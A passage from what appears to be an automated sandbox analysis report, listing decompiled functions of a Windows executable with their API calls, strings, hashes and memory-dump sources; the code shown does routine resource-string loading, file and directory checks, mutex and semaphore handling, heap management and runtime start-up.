					_v1576 = _t47;
				}
				if(_t49 >= 0) {
					_push(_t62);
					_t63 = 0x5610;
					do {
						_t59 = _v1572;
						E01155F98(_t60, _v1572, _t60, _t63);
						_t63 = _t63 + 1;
					} while (_t63 <= 0x5613);
					_v1584 = _v1584 & 0x00000000;
					_t61 = 0x5630;
					_t64 = _v1584;
					_t50 = _v1580;
					do {
						_t35 = LoadStringW(_t50, _t61,  &_v1048, 0x104);
						_t71 = _t35;
						if(_t35 == 0) {
							_t36 = 0x80004005;
						} else {
							_t59 =  &_v1568;
							_t36 = E01155F32(_t50, _v1572,  &_v1568, _t71,  &_v1048);
						}
						if(_t36 >= 0 && PathFileExistsW( &_v1568) != 0) {
							_t64 = _t64 + 1;
						}
						_t61 = _t61 + 1;
					} while (_t61 <= 0x5631);
					_t49 = _v1576;
					_t65 = 0x5630;
					if(_t64 >= 2) {
						_t38 = PathFileExistsW( &_v528);
						if(_t38 != 0 || CreateDirectoryW( &_v528, _t38) != 0) {
							_t51 = _v1580;
							do {
								_t59 = _v1572;
								E01156049(_t51, _v1572,  &_v528, _t65);
								_t65 = _t65 + 1;
							} while (_t65 <= 0x5631);
							_t49 = _v1576;
						}
					}
					_pop(_t62);
				}
				return E01159250(_t49, _t49, _v8 ^ _t66, _t59, _t60, _t62);
			}

0x01156106
0x01156111
0x01156118
0x01156128
0x01156130
0x01156132
0x01156139
0x0115613f
0x01156145
0x01156147
0x01156167
0x0115616c
0x01156149
0x01156152
0x01156158
0x0115615d
0x0115615f
0x0115615f
0x01156174
0x0115617a
0x0115617b
0x01156180
0x01156180
0x01156189
0x0115618e
0x0115618f
0x01156197
0x0115619e
0x011561a3
0x011561a9
0x011561af
0x011561bd
0x011561c3
0x011561c5
0x011561e1
0x011561c7
0x011561d4
0x011561da
0x011561da
0x011561e8
0x011561fb
0x011561fb
0x011561fc
0x011561fd
0x01156205
0x0115620e
0x01156213
0x0115621c
0x01156224
0x01156238
0x0115623e
0x0115623e
0x0115624e
0x01156253
0x01156254
0x0115625c
0x0115625c
0x01156224
0x01156262
0x01156262
0x01156274

APIs

LoadStringW.USER32(?,00005601,?,00000104), ref: 0115613F
LoadStringW.USER32(?,00005630,?,00000104), ref: 011561BD
PathFileExistsW.SHLWAPI(?), ref: 011561F1
PathFileExistsW.SHLWAPI(?), ref: 0115621C
CreateDirectoryW.KERNEL32(?,00000000), ref: 0115622E

Memory Dump Source

Source File: 00000005.00000002.667280307.0000000001151000.00000020.00020000.sdmp, Offset: 01150000, based on PE: true

Associated: 00000005.00000002.667276136.0000000001150000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.667289439.000000000115A000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.667293879.000000000115B000.00000002.00020000.sdmp Download File

Similarity

API ID: ExistsFileLoadPathString$CreateDirectory
String ID:
API String ID: 2019810426-0
Opcode ID: d1d093ca31b6193b07b0412f23c9a1daf856f27e6afc93f0fd0ebb64d0f47e33
Instruction ID: 420240ffb70435566e09382d52a1ecdc8901980445d39602965b9756a97b8ba7
Opcode Fuzzy Hash: d1d093ca31b6193b07b0412f23c9a1daf856f27e6afc93f0fd0ebb64d0f47e33
Instruction Fuzzy Hash: 774182B1E01618DBEB64DE14CCC4AEEB7BAEBC8310F4001B59A2997241DB319E95CF94

Uniqueness

Uniqueness Score: -1.00%

Function 011575A9, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E011575A9(void* __ecx, void* __eflags, intOrPtr* _a4) {
				short* _v0;
				signed int _v8;
				char _v532;
				short* _v536;
				short _v540;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				intOrPtr* _t18;
				int _t31;
				void* _t32;
				int _t41;
				void* _t42;
				void* _t44;
				void* _t45;
				signed int _t46;

				_t48 = (_t46 & 0xfffffff8) - 0x21c;
				_t16 =  *0x115a064; // 0xc03c63c6
				_v8 = _t16 ^ (_t46 & 0xfffffff8) - 0x0000021c;
				_t18 = _a4;
				_t39 = 0x104;
				_push(_t31);
				_t41 = 0;
				_v536 = _t18;
				 *_t18 = 0;
				 *((intOrPtr*)(_t18 + 4)) = 0;
				E0115379D( &_v532, 0x104, __ecx);
				_t35 =  &_v536;
				E01156943( &_v536, L"_p0");
				_t44 = OpenSemaphoreW(0x1f0003, 0,  &_v540);
				if(_t44 != 0) {
					_t39 =  &_v540;
					_v540 = 0;
					_t36 = _t44;
					_t31 = E0115748E(_t44, _t39);
					if(_t31 >= 0) {
						_t35 = _v536;
						asm("cdq");
						 *_t35 = _v540;
						_t35[2] = _t39;
					} else {
						_t35 = _v0;
						_t39 = 0xce;
						E01157328(_t36, _t31);
						_t41 = _t31;
					}
				} else {
					if(GetLastError() != 2) {
						_t35 = _v0;
						_t39 = 0xc8;
						_t41 = E01157347("wil");
					}
				}
				if(_t44 != 0) {
					_push(_t44);
					E011573A3(_t31, _t35);
				}
				_pop(_t42);
				_pop(_t45);
				_pop(_t32);
				return E01159250(_t41, _t32, _v8 ^ _t48, _t39, _t42, _t45);
			}

0x011575b1
0x011575b7
0x011575be
0x011575c5
0x011575c8
0x011575cd
0x011575d0
0x011575d2
0x011575db
0x011575dd
0x011575e0
0x011575ea
0x011575ee
0x01157604
0x01157608
0x0115762b
0x0115762f
0x01157633
0x0115763a
0x0115763e
0x01157653
0x0115765b
0x0115765c
0x0115765e
0x01157640
0x01157642
0x01157645
0x0115764a
0x0115764f
0x0115764f
0x0115760a
0x01157613
0x01157615
0x01157618
0x01157627
0x01157627
0x01157613
0x01157663
0x01157665
0x01157666
0x01157666
0x01157674
0x01157675
0x01157676
0x01157681

APIs

OpenSemaphoreW.KERNEL32(001F0003,00000000,?), ref: 011575FE
GetLastError.KERNEL32 ref: 0115760A

Strings

_p0, xrefs: 011575E5
wil, xrefs: 0115761D

Memory Dump Source

Source File: 00000005.00000002.667280307.0000000001151000.00000020.00020000.sdmp, Offset: 01150000, based on PE: true

Associated: 00000005.00000002.667276136.0000000001150000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.667289439.000000000115A000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.667293879.000000000115B000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastOpenSemaphore
String ID: _p0$wil
API String ID: 1909229842-1814513734
Opcode ID: 0f5d4f90354dc1744059ec19e9c1eba0a71e9a56f122ed75c59ce03fd3df4f48
Instruction ID: c0fbd113b0f0716eb94fa18f272c64264c52a67ba757220fbf24cba676484136
Opcode Fuzzy Hash: 0f5d4f90354dc1744059ec19e9c1eba0a71e9a56f122ed75c59ce03fd3df4f48
Instruction Fuzzy Hash: C521DE71205302DFD3A8EF28D482A6BBBE6EBD4314F804529FC6587380DB308D05C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 01157B77, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(ntdll.dll,RtlAreLongPathsEnabled,00000104,?,?,?,01157C36,?,?,00000104,01158049,00000000), ref: 01157B9D
GetProcAddress.KERNEL32(00000000), ref: 01157BA4

Strings

ntdll.dll, xrefs: 01157B98
RtlAreLongPathsEnabled, xrefs: 01157B93

Memory Dump Source

Source File: 00000005.00000002.667280307.0000000001151000.00000020.00020000.sdmp, Offset: 01150000, based on PE: true

Associated: 00000005.00000002.667276136.0000000001150000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.667289439.000000000115A000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.667293879.000000000115B000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: RtlAreLongPathsEnabled$ntdll.dll
API String ID: 1646373207-3809284139
Opcode ID: e93e0bd55222146a3f08fcc111800b508825280dfd1effd3eef1cbb0bad9cdea
Instruction ID: f399952e1ec12dce4c95fbcf1574776c20f6e93b48f2470226cbe0d2914c6b0b
Opcode Fuzzy Hash: e93e0bd55222146a3f08fcc111800b508825280dfd1effd3eef1cbb0bad9cdea
Instruction Fuzzy Hash: 01F0F672640308EB87BD9B59B806A3A7BA6EFC42607120169FE3A83240DB3448014755

Uniqueness

Uniqueness Score: -1.00%

Function 01158C1F, Relevance: 6.4, APIs: 5, Instructions: 110
memoryCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E01158C1F(long* __ecx, signed int* __edx, intOrPtr* _a4) {
				intOrPtr _v0;
				int _v8;
				int _v12;
				intOrPtr _v16;
				int _v20;
				intOrPtr* _v24;
				void* _v32;
				long* _v44;
				void* __ebx;
				unsigned int _t36;
				long* _t38;
				intOrPtr* _t44;
				unsigned int _t49;
				signed int* _t58;
				void* _t59;
				intOrPtr _t61;
				long* _t63;
				signed int _t70;
				long* _t79;
				void* _t81;
				void* _t82;
				long* _t87;
				void* _t88;
				int _t90;
				void* _t91;

				_t63 = __ecx;
				_t58 = __edx;
				_t87 = __ecx;
				 *_a4 = 0;
				_t36 = HeapAlloc(GetProcessHeap(), 8, 0x40);
				_v20 = _t36;
				if(_t36 != 0) {
					_v12 = 0;
					_v8 = 0;
					if((_t36 & 0x00000003) != 0) {
						E0115739D(_t36);
						asm("int3");
						_push(_t63);
						_v44 = _t63;
						_t38 = _t63 + 0x28;
						_push(0);
						_t79 = _v44;
						_v44 = _t38;
						if(_t79 != _t38) {
							_push(_t58);
							_push(_t87);
							do {
								_t59 =  *_t79;
								if(_t59 != 0) {
									do {
										_t88 = _t59;
										_t59 =  *(_t59 + 0x1c);
										E01157798(_t88);
										HeapFree(GetProcessHeap(), 0, _t88);
									} while (_t59 != 0);
									_t38 = _v12;
								}
								 *_t79 = 0;
								_t79 =  &(_t79[1]);
							} while (_t79 != _t38);
						}
						return _t38;
					} else {
						_push(0);
						_t81 = E011573EF( &_v12, _t87, _t63, _t36 >> 2);
						if(_t81 >= 0) {
							_t44 = _v24;
							_t90 = 0x30;
							 *_t44 = 1;
							_t82 = _t44 + 0x10;
							 *(_t44 + 4) =  *_t58;
							 *_t58 =  *_t58 & 0x00000000;
							_t61 = 0;
							 *((intOrPtr*)(_t44 + 8)) = _v16;
							 *((intOrPtr*)(_t44 + 0xc)) = _v12;
							_v16 = 0;
							_v20 = 0;
							_v12 = 0;
							memset(_t82, 0, _t90);
							 *_t82 = _t90;
							 *((intOrPtr*)(_t82 + 4)) = 1;
							_t91 = 0;
							_t70 = 0xa;
							memset(_t82 + 8, 0, _t70 << 2);
							_t72 = _a4;
							_t81 = 0;
							 *_a4 = _v24;
							_t49 = _v20;
						} else {
							_t72 = _v0;
							E01157328( &_v12, _t81);
							_t49 = _v20;
							_t61 = _v24;
							_t91 = _v32;
						}
						if(_t49 != 0) {
							_push(_t49);
							E011573A3(_t61, _t72);
						}
						if(_t61 != 0) {
							_push(_t61);
							E011573A3(_t61, _t72);
						}
						if(_t91 != 0) {
							HeapFree(GetProcessHeap(), 0, _t91);
						}
						goto L12;
					}
				} else {
					_t81 = 0x8007000e;
					E01157328(_t63, 0x8007000e);
					L12:
					return _t81;
				}
			}

0x01158c1f
0x01158c34
0x01158c38
0x01158c3a
0x01158c43
0x01158c49
0x01158c4f
0x01158c6a
0x01158c6e
0x01158c74
0x01158d46
0x01158d4b
0x01158d51
0x01158d52
0x01158d55
0x01158d58
0x01158d59
0x01158d5c
0x01158d61
0x01158d63
0x01158d64
0x01158d65
0x01158d65
0x01158d69
0x01158d6b
0x01158d6b
0x01158d6d
0x01158d72
0x01158d81
0x01158d87
0x01158d8b
0x01158d8b
0x01158d8e
0x01158d94
0x01158d97
0x01158d9c
0x01158da1
0x01158c7a
0x01158c7a
0x01158c8a
0x01158c8e
0x01158cad
0x01158cb3
0x01158cb5
0x01158cbb
0x01158cc0
0x01158cc3
0x01158cc6
0x01158ccc
0x01158cd3
0x01158cda
0x01158cde
0x01158ce2
0x01158ce6
0x01158cee
0x01158cf1
0x01158cfd
0x01158d01
0x01158d02
0x01158d04
0x01158d07
0x01158d0d
0x01158d0f
0x01158c90
0x01158c92
0x01158c9a
0x01158c9f
0x01158ca3
0x01158ca7
0x01158ca7
0x01158d15
0x01158d17
0x01158d18
0x01158d18
0x01158d1f
0x01158d21
0x01158d22
0x01158d22
0x01158d29
0x01158d35
0x01158d35
0x00000000
0x01158d29
0x01158c51
0x01158c51
0x01158c60
0x01158d3b
0x01158d43
0x01158d43

APIs

GetProcessHeap.KERNEL32(00000008,00000040,?,00000000,?,?,?,01158B01,?,?,?,0115A054,00000000), ref: 01158C3C
HeapAlloc.KERNEL32(00000000,?,?,01158B01,?,?,?,0115A054,00000000,?,?,?,?,?,00000000), ref: 01158C43
GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,01158B01,?,?,?,0115A054,00000000), ref: 01158D2E
HeapFree.KERNEL32(00000000,?,00000000,00000000,?,?,01158B01,?,?,?,0115A054,00000000), ref: 01158D35

Memory Dump Source

Source File: 00000005.00000002.667280307.0000000001151000.00000020.00020000.sdmp, Offset: 01150000, based on PE: true

Associated: 00000005.00000002.667276136.0000000001150000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.667289439.000000000115A000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.667293879.000000000115B000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: bacd54076eef2cc4db1a5ad5ad7b4a123d75116ef0b707e21055819264ae9e77
Instruction ID: 50dd376bdc02f8d2e2ae45a2d3f855de93d0c5b390c390aeb2db997822a022ac
Opcode Fuzzy Hash: bacd54076eef2cc4db1a5ad5ad7b4a123d75116ef0b707e21055819264ae9e77
Instruction Fuzzy Hash: 7F318FB1608301DBD358DF1AC845A6BBBE9EF98320F10452DFD6897390CB70D805CB61

Uniqueness

Uniqueness Score: -1.00%

Function 01155F98, Relevance: 6.1, APIs: 4, Instructions: 59
fileCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E01155F98(struct HINSTANCE__* __ecx, short* __edx, void* __edi, int _a4) {
				signed int _v8;
				short _v528;
				short _v1048;
				void* __esi;
				signed int _t11;
				int _t14;
				void* _t21;
				WCHAR* _t25;
				int _t27;
				void* _t30;
				WCHAR* _t31;
				signed int _t32;

				_t30 = __edi;
				_t29 = __edx;
				_t11 =  *0x115a064; // 0xc03c63c6
				_v8 = _t11 ^ _t32;
				_t31 = __edx;
				_t14 = LoadStringW(__ecx, _a4,  &_v1048, 0x104);
				_t33 = _t14;
				if(_t14 == 0) {
					_t15 = 0x80004005;
				} else {
					_t29 =  &_v528;
					_t15 = E01155F32(_t21, _t31,  &_v528, _t33,  &_v1048);
				}
				if(_t15 < 0) {
					L10:
					return E01159250(_t15, _t21, _v8 ^ _t32, _t29, _t30, _t31);
				} else {
					_t25 = _t31;
					_t29 =  &(_t25[1]);
					do {
						_t15 =  *_t25;
						_t25 =  &(_t25[1]);
					} while (_t15 != 0);
					_t27 = _t25 - _t29 >> 1;
					if(_t27 > 3 && StrCmpNW(_t31,  &_v528, _t27) == 0 && StrStrW( &_v528, L"..") == 0) {
						_t15 = DeleteFileW( &_v528);
					}
					goto L10;
				}
			}

0x01155f98
0x01155f98
0x01155fa3
0x01155faa
0x01155fb9
0x01155fc0
0x01155fc6
0x01155fc8
0x01155fe0
0x01155fca
0x01155fd3
0x01155fd9
0x01155fd9
0x01155fe7
0x01156038
0x01156046
0x01155fe9
0x01155fe9
0x01155feb
0x01155fee
0x01155fee
0x01155ff1
0x01155ff4
0x01155ffb
0x01156000
0x01156032
0x01156032
0x00000000
0x01156000

APIs

LoadStringW.USER32(?,00005610,?,00000104), ref: 01155FC0
StrCmpNW.SHLWAPI(?,?,?), ref: 0115600B
StrStrW.SHLWAPI(?,011521E8), ref: 01156021
DeleteFileW.KERNEL32(?), ref: 01156032

Memory Dump Source

Source File: 00000005.00000002.667280307.0000000001151000.00000020.00020000.sdmp, Offset: 01150000, based on PE: true

Associated: 00000005.00000002.667276136.0000000001150000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.667289439.000000000115A000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.667293879.000000000115B000.00000002.00020000.sdmp Download File

Similarity

API ID: DeleteFileLoadString
String ID:
API String ID: 1470351836-0
Opcode ID: 049f0dc28d81799a1ad75fd0434acd6a06d234140ca27de5d69a98bc15ed72d6
Instruction ID: 9fee54f516130c0c15e78b1da6570c92b04772c8477aace6dd576851008e4ad5
Opcode Fuzzy Hash: 049f0dc28d81799a1ad75fd0434acd6a06d234140ca27de5d69a98bc15ed72d6
Instruction Fuzzy Hash: B611CEB5600208EBDBACDB24DC48AFB777DDF44340F4041AAAE36D7100EB309A84CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 01158F80, Relevance: 6.0, APIs: 4, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01158F80() {
				signed int _t10;
				intOrPtr* _t13;
				intOrPtr* _t14;
				void* _t15;
				signed int _t18;
				intOrPtr _t19;
				intOrPtr _t22;
				intOrPtr _t23;
				void* _t25;

				_t25 =  *0x1150000 - 0x5a4d; // 0x5a4d
				if(_t25 == 0) {
					_t19 =  *0x115003c; // 0xe0
					__eflags =  *((intOrPtr*)(_t19 + 0x1150000)) - 0x4550;
					if( *((intOrPtr*)(_t19 + 0x1150000)) != 0x4550) {
						goto L1;
					} else {
						_t2 = _t19 + 0x1150018; // 0xc0e010b
						_t18 =  *_t2 & 0x0000ffff;
						__eflags = _t18 - 0x10b;
						if(_t18 == 0x10b) {
							_t10 = 0;
							__eflags =  *((intOrPtr*)(_t19 + 0x1150074)) - 0xe;
							if( *((intOrPtr*)(_t19 + 0x1150074)) > 0xe) {
								__eflags =  *(_t19 + 0x11500e8);
								goto L9;
							}
						} else {
							__eflags = _t18 - 0x20b;
							if(_t18 != 0x20b) {
								goto L1;
							} else {
								_t10 = 0;
								__eflags =  *((intOrPtr*)(_t19 + 0x1150084)) - 0xe;
								if( *((intOrPtr*)(_t19 + 0x1150084)) > 0xe) {
									__eflags =  *(_t19 + 0x11500f8);
									L9:
									_t8 = __eflags != 0;
									__eflags = _t8;
									_t10 = _t10 & 0xffffff00 | _t8;
								}
							}
						}
					}
				} else {
					L1:
					_t10 = 0;
				}
				 *0x115a098 = _t10;
				__set_app_type(E011593FE(1));
				 *0x115aa5c =  *0x115aa5c | 0xffffffff;
				 *0x115aa60 =  *0x115aa60 | 0xffffffff;
				_t13 = __p__fmode();
				_t22 =  *0x115a0ac; // 0x0
				 *_t13 = _t22;
				_t14 = __p__commode();
				_t23 =  *0x115a0a0; // 0x0
				 *_t14 = _t23;
				_t15 = E01159620();
				if( *0x115a060 == 0) {
					__setusermatherr(E01159620);
				}
				E01159623(_t15);
				return 0;
			}

0x01158f85
0x01158f8c
0x01158f92
0x01158f98
0x01158fa2
0x00000000
0x01158fa4
0x01158fa4
0x01158fa4
0x01158fab
0x01158fb0
0x01158fcc
0x01158fce
0x01158fd5
0x01158fd7
0x00000000
0x01158fd7
0x01158fb2
0x01158fb2
0x01158fb7
0x00000000
0x01158fb9
0x01158fb9
0x01158fbb
0x01158fc2
0x01158fc4
0x01158fdd
0x01158fdd
0x01158fdd
0x01158fdd
0x01158fdd
0x01158fc2
0x01158fb7
0x01158fb0
0x01158f8e
0x01158f8e
0x01158f8e
0x01158f8e
0x01158fe2
0x01158fed
0x01158ff3
0x01158ffa
0x01159003
0x01159009
0x0115900f
0x01159011
0x01159017
0x0115901d
0x0115901f
0x0115902b
0x01159032
0x01159038
0x01159039
0x01159040

APIs

__set_app_type.MSVCRT ref: 01158FED
__p__fmode.MSVCRT ref: 01159003
__p__commode.MSVCRT ref: 01159011
__setusermatherr.MSVCRT ref: 01159032

Memory Dump Source

Source File: 00000005.00000002.667280307.0000000001151000.00000020.00020000.sdmp, Offset: 01150000, based on PE: true

Associated: 00000005.00000002.667276136.0000000001150000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.667289439.000000000115A000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.667293879.000000000115B000.00000002.00020000.sdmp Download File

Similarity

API ID: __p__commode__p__fmode__set_app_type__setusermatherr
String ID:
API String ID: 1063105408-0
Opcode ID: ec7239f604e7b30a35500005574952e11f940e01d60586a1f362f8effefab738
Instruction ID: f0f03f08c91d4d3c8c966cbd88da85f62581ef55a8ffe09ab6fd731891b67f44
Opcode Fuzzy Hash: ec7239f604e7b30a35500005574952e11f940e01d60586a1f362f8effefab738
Instruction Fuzzy Hash: F8113C30954309CFDBFC9F75E4485253762BB083A9F244B7AEA36861C9DB7684C5CB12

Uniqueness

Uniqueness Score: -1.00%

Function 011589B0, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 119
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E011589B0(void* __ecx, signed int* __edx, void* __edi, void* __eflags) {
				signed int _v0;
				signed int _v8;
				char _v528;
				signed int _v532;
				signed int _v536;
				signed int _v544;
				signed int _v548;
				void* __ebx;
				void* __esi;
				signed int _t24;
				signed int _t35;
				signed int* _t46;
				signed int _t56;
				signed int _t59;
				signed int _t60;

				_t55 = __edi;
				_t54 = __edx;
				_t24 =  *0x115a064; // 0xc03c63c6
				_v8 = _t24 ^ _t60;
				_t46 = __edx;
				 *((intOrPtr*)(__edx)) = 0;
				E01153280( &_v528, 0x104, L"Local\\SM0:%d:%d:%hs", GetCurrentProcessId());
				_v532 = 0;
				__imp__CreateMutexExW(0,  &_v528, 0, 0x1f0001, 0x40, __ecx);
				E0115897F( &_v532,  &_v528);
				if(_v532 != 0) {
					_push(__edi);
					E01158DA2( &_v532, _t54,  &_v536);
					_v548 = 0;
					_t50 =  &_v528;
					_v544 = 0;
					_t56 = 0;
					_t59 = E011575A9(_t50, __eflags,  &_v548,  &_v532);
					__eflags = _t59;
					if(_t59 >= 0) {
						_t35 = _v548;
						_t59 = 0;
						__eflags = 0;
					} else {
						_push(_t59);
						_push(_t50);
						_t50 = _v0;
						_t54 = 0x61;
						E01157328();
						_t35 = 0;
					}
					__eflags = _t59;
					if(_t59 >= 0) {
						_t56 = _t35 << 2;
						_t59 = 0;
						__eflags = 0;
					} else {
						_push(_t59);
						_push(_t50);
						_t50 = _v0;
						_t54 = 0x6a;
						E01157328();
					}
					__eflags = _t59;
					if(_t59 >= 0) {
						__eflags = _t56;
						if(_t56 == 0) {
							_t54 =  &_v532;
							_t50 =  &_v528;
							_t59 = E01158C1F( &_v528,  &_v532, _t46);
							__eflags = _t59;
							if(_t59 >= 0) {
								L12:
								_t59 = 0;
								__eflags = 0;
								goto L13;
							}
							_t54 = 0x129;
							goto L20;
						}
						 *_t46 = _t56;
						_t50 =  *_t56 + 1;
						__eflags = _t50;
						 *( *_t46) = _t50;
						goto L12;
					} else {
						_t54 = 0x121;
						L20:
						_t50 = _v0;
						E01157328(_v0, _t59);
						L13:
						__eflags = _v536;
						_pop(_t55);
						if(_v536 != 0) {
							_push(_v536);
							E011573CA(_t50);
						}
						__eflags = _v532;
						if(_v532 != 0) {
							_push(_v532);
							E011573A3(_t46, _t50);
						}
						L17:
						return E01159250(_t59, _t46, _v8 ^ _t60, _t54, _t55, _t59);
					}
				}
				_t59 = E01156E6C( &_v532);
				goto L17;
			}

0x011589b0
0x011589b0
0x011589bb
0x011589c2
0x011589c7
0x011589ce
0x011589e8
0x011589f0
0x01158a04
0x01158a11
0x01158a1c
0x01158a2a
0x01158a3b
0x01158a47
0x01158a4e
0x01158a54
0x01158a5a
0x01158a61
0x01158a63
0x01158a65
0x01158a78
0x01158a7e
0x01158a7e
0x01158a67
0x01158a67
0x01158a68
0x01158a69
0x01158a6e
0x01158a6f
0x01158a74
0x01158a74
0x01158a80
0x01158a82
0x01158a95
0x01158a98
0x01158a98
0x01158a84
0x01158a84
0x01158a85
0x01158a86
0x01158a8b
0x01158a8c
0x01158a8c
0x01158a9a
0x01158a9c
0x01158aa5
0x01158aa7
0x01158af0
0x01158af6
0x01158b01
0x01158b03
0x01158b05
0x01158ab2
0x01158ab2
0x01158ab2
0x00000000
0x01158ab2
0x01158b07
0x00000000
0x01158b07
0x01158aa9
0x01158aaf
0x01158aaf
0x01158ab0
0x00000000
0x01158a9e
0x01158a9e
0x01158b0c
0x01158b0e
0x01158b11
0x01158ab4
0x01158ab4
0x01158abb
0x01158abc
0x01158abe
0x01158ac4
0x01158ac4
0x01158ac9
0x01158ad0
0x01158ad2
0x01158ad8
0x01158ad8
0x01158add
0x01158aee
0x01158aee
0x01158a9c
0x01158a23
0x00000000

APIs

GetCurrentProcessId.KERNEL32(00000040,?,00000000,00000000), ref: 011589D0

Part of subcall function 01153280: _vsnwprintf.MSVCRT ref: 011532B2

CreateMutexExW.KERNEL32(00000000,?,00000000,001F0001,?,?,?,?,?,00000000), ref: 01158A04

Part of subcall function 0115897F: GetLastError.KERNEL32(?,00000000,?,?,01158960,00000000,?,?,?,?,0115745B,?,00000001,?), ref: 0115898F
Part of subcall function 0115897F: SetLastError.KERNEL32(00000000,?,00000000,?,?,01158960,00000000,?,?,?,?,0115745B,?,00000001,?), ref: 0115899E

Part of subcall function 01158C1F: GetProcessHeap.KERNEL32(00000008,00000040,?,00000000,?,?,?,01158B01,?,?,?,0115A054,00000000), ref: 01158C3C
Part of subcall function 01158C1F: HeapAlloc.KERNEL32(00000000,?,?,01158B01,?,?,?,0115A054,00000000,?,?,?,?,?,00000000), ref: 01158C43

Strings

Local\SM0:%d:%d:%hs, xrefs: 011589D7

Memory Dump Source

Source File: 00000005.00000002.667280307.0000000001151000.00000020.00020000.sdmp, Offset: 01150000, based on PE: true

Associated: 00000005.00000002.667276136.0000000001150000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.667289439.000000000115A000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.667293879.000000000115B000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorHeapLastProcess$AllocCreateCurrentMutex_vsnwprintf
String ID: Local\SM0:%d:%d:%hs
API String ID: 1886125127-4162240545
Opcode ID: d8e21f773e965cc68474f746a387dc3bef9f5ee77b221777a4402b2ba06cb230
Instruction ID: bddccd481028131299d725097ad86b63fb4cf0b3bd38d26ef2476e1017da6d6b
Opcode Fuzzy Hash: d8e21f773e965cc68474f746a387dc3bef9f5ee77b221777a4402b2ba06cb230
Instruction Fuzzy Hash: D5411471A40239EBCB79EB65DC89AEAB779EF54710F000295ED2967280DB705E80CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 01157684, Relevance: 5.1, APIs: 4, Instructions: 106
memoryCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E01157684(void* __ecx, void* __edi, intOrPtr* _a4, intOrPtr _a8) {
				intOrPtr _v8;
				void* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _t48;
				intOrPtr* _t51;
				intOrPtr* _t54;
				void* _t56;
				void* _t57;
				intOrPtr _t64;
				intOrPtr _t66;
				intOrPtr* _t67;
				intOrPtr* _t70;
				intOrPtr* _t71;
				void* _t73;
				void* _t81;
				void* _t82;
				void* _t83;
				long _t86;
				void* _t88;

				_t83 = __edi;
				_t67 = _a4;
				_t88 = __ecx;
				 *((intOrPtr*)(__ecx + 4)) = _a8;
				 *((intOrPtr*)(__ecx + 8)) =  *((intOrPtr*)(_t67 + 4));
				_t48 = __ecx + 0xc;
				 *_t48 = 0;
				_v16 = _t48;
				 *((short*)(__ecx + 0x10)) =  *((intOrPtr*)(_t67 + 0x20));
				 *((intOrPtr*)(__ecx + 0x14)) =  *_t67;
				_t51 = __ecx + 0x1c;
				 *_t51 = 0;
				_v20 = _t51;
				 *((intOrPtr*)(__ecx + 0x20)) =  *((intOrPtr*)(_t67 + 0x48));
				 *((intOrPtr*)(__ecx + 0x24)) =  *((intOrPtr*)(_t67 + 0x4c));
				_t54 = __ecx + 0x28;
				 *_t54 = 0;
				_t70 =  *((intOrPtr*)(_t67 + 0x1c));
				_v24 = _t54;
				_t56 = 1;
				_v8 = 1;
				if(_t70 == 0) {
					L4:
					_t71 =  *((intOrPtr*)(_t67 + 0x44));
					_v12 = _t56;
					if(_t71 == 0) {
						L8:
						_push(_t83);
						_t57 = E01156E8F( *((intOrPtr*)(_t67 + 0xc)));
						_t86 = _t57 + _v8 + _v12;
						if( *(_t88 + 0x2c) == 0 ||  *(_t88 + 0x30) < _t86) {
							_t57 = HeapAlloc(GetProcessHeap(), 8, _t86);
							_v12 = _t57;
							if(_t57 != 0) {
								HeapFree(GetProcessHeap(), 0,  *(_t88 + 0x2c));
								_t57 = _v12;
								 *(_t88 + 0x2c) = _t57;
								 *(_t88 + 0x30) = _t86;
							}
						}
						_t73 =  *(_t88 + 0x2c);
						if(_t73 == 0) {
							return _t57;
						} else {
							_t90 = _t73 +  *(_t88 + 0x30);
							return E01158DEA(E01158E68(E01158E68(_t73, _t73 +  *(_t88 + 0x30),  *((intOrPtr*)(_t67 + 0x1c)), _v16), _t73 +  *(_t88 + 0x30),  *((intOrPtr*)(_t67 + 0x44)), _v20), _t90,  *((intOrPtr*)(_t67 + 0xc)), _v24);
						}
					}
					_t81 = _t71 + 1;
					do {
						_t64 =  *_t71;
						_t71 = _t71 + 1;
					} while (_t64 != 0);
					_v8 = _t71 - _t81 + 1;
					goto L8;
				}
				_t82 = _t70 + 1;
				do {
					_t66 =  *_t70;
					_t70 = _t70 + 1;
				} while (_t66 != 0);
				_t56 = _t70 - _t82 + 1;
				goto L4;
			}

0x01157684
0x01157690
0x01157694
0x01157698
0x0115769e
0x011576a1
0x011576a4
0x011576a6
0x011576ad
0x011576b3
0x011576b6
0x011576b9
0x011576bb
0x011576c1
0x011576c7
0x011576ca
0x011576cd
0x011576cf
0x011576d2
